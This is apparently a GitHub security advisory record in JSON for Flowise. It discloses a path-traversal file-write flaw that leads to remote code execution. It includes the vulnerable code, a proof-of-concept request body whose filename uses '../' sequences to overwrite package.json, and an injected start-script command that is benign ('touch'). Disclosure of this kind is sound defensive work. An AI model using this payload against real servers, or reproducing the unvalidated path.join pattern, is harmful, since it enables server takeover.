{
  "schema_version": "1.4.0",
  "id": "GHSA-8vvx-qvq9-5948",
  "modified": "2025-03-14T18:48:44Z",
  "published": "2025-03-14T18:48:44Z",
  "aliases": [],
  "summary": "Flowise allows arbitrary file write to RCE",
  "details": "### Summary\nAn attacker could write files with arbitrary content to the filesystem via the `/api/v1/document-store/loader/process` API.\nAn attacker can reach RCE(Remote Code Execution) via file writing.\n\n### Details\nAll file writing functions in [packages/components/src/storageUtils.ts](https://github.com/FlowiseAI/Flowise/blob/main/packages/components/src/storageUtils.ts) are vulnerable.\n- addBase64FilesToStorage\n- addArrayFilesToStorage\n- addSingleFileToStorage\n\nThe fileName parameter, which is an untrusted external input, is being used as an argument to path.join() without verification.\n```javascript\nconst filePath = path.join(dir, fileName)\nfs.writeFileSync(filePath, bf)\n```\nTherefore, users can move to the parent folder via `../` and write files to any path.\n\nOnce file writing is possible in all paths, an attacker can reach RCE (Remote Code Execution) in a variety of ways.\n\nIn PoC (Proof of Concept), RCE was reached by overwriting package.json.\n\n### PoC\nIn PoC, `package.json` is overwritten.\nThis is a scenario in which arbitrary code is executed when `pnpm start` is executed by changing the start command in the `scripts{}` statement to an arbitrary value.\n\n**- original start command**\n````\n\"start\": \"run-script-os\",\n````\n\n**- modify start command**\n````\n\"start\": \"touch /tmp/pyozzi-poc && run-script-os\",\n````\n\nWhen a user runs the `pnpm start` command, a `pyozzi-poc` file is created in the `/tmp` path.\n\n#### 1. package.json content base64 encoding\n```json\n{\n    \"name\": \"flowise\",\n    \"version\": \"1.8.2\",\n    \"private\": true,\n    \"homepage\": \"https://flowiseai.com\",\n    \"workspaces\": [\n        \"packages/*\",\n        \"flowise\",\n        \"ui\",\n        \"components\"\n    ],\n    \"scripts\": {\n        \"build\": \"turbo run build && echo poc\",\n        \"build-force\": \"pnpm clean && turbo run build --force\",\n        \"dev\": \"turbo run dev --parallel\",\n        \"start\": \"touch /tmp/pyozzi-poc && run-script-os\", --> modify (add touch /tmp/pyozzi &&)\n        \"start:windows\": \"cd packages/server/bin && run start\",\n        \"start:default\": \"cd packages/server/bin && ./run start\",\n        \"clean\": \"pnpm --filter \\\"./packages/**\\\" clean\",\n        \"nuke\": \"pnpm --filter \\\"./packages/**\\\" nuke && rimraf node_modules .turbo\",\n        \"format\": \"prettier --write \\\"**/*.{ts,tsx,md}\\\"\",\n        \"lint\": \"eslint \\\"**/*.{js,jsx,ts,tsx,json,md}\\\"\",\n        \"lint-fix\": \"pnpm lint --fix\",\n        \"quick\": \"pretty-quick --staged\",\n        \"postinstall\": \"husky install\",\n        \"migration:create\": \"pnpm typeorm migration:create\"\n    }, ... skip\n```\n\n#### 2. Overwrite `package.json` via `/api/v1/document-store/loader/process`\n<img width=\"1329\" alt=\"image\" src=\"https://github.com/FlowiseAI/Flowise/assets/86613161/a548732d-4bee-4cd0-8565-54fb8e560500\">\n\n> **Request Body**\n```json\n{\n    \"loaderId\": \"textFile\",\n    \"storeId\": \"c4b8a8fb-9eb6-47ae-9caa-7702ef8baabb\",\n    \"loaderName\": \"Text File\",\n    \"loaderConfig\": {\n        \"txtFile\": \"data:text/plain;BASE64_ENCODEING_CONTENT,filename:/../../../../../usr/src/package.json\",\n        \"textSplitter\": \"\",\n        \"metadata\": \"\",\n        \"omitMetadataKeys\": \"\"\n    }\n}\n```\nThe part after `filename:` of the `txtFile` parameter is the value used as `fileName` in the function.\nAdd `../` to the filename value to move to the top path, then specify `package.json` in the project folder `/usr/src/` as the path.\n\n<img width=\"663\" alt=\"image\" src=\"https://github.com/FlowiseAI/Flowise/assets/86613161/13fdc756-f4d3-45f9-9929-fd978f532a02\">\n\nAfterwards, when the user starts the server (`pnpm start`), the added script will be executed. (`touch /tmp/pyozzi-poc`)\n\n**- starting server with `touch /tmp/pyozzi-poc` command**\n<img width=\"737\" alt=\"image\" src=\"https://github.com/FlowiseAI/Flowise/assets/86613161/341be379-43ca-4acc-9126-dc398475fcf3\">\n\n**- `/tmp/pyozzi-poc` file created**\n<img width=\"751\" alt=\"image\" src=\"https://github.com/FlowiseAI/Flowise/assets/86613161/15707068-c000-4d59-972d-89d969c27087\">\n\n\n### Impact\n**Remote Code Execution (RCE)**\nAlthough it is demonstrated here using the file creation command, you can obtain full server shell privileges by opening a reverse shell.",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.2.7"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-8vvx-qvq9-5948"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-14T18:48:44Z",
    "nvd_published_at": null
  }
}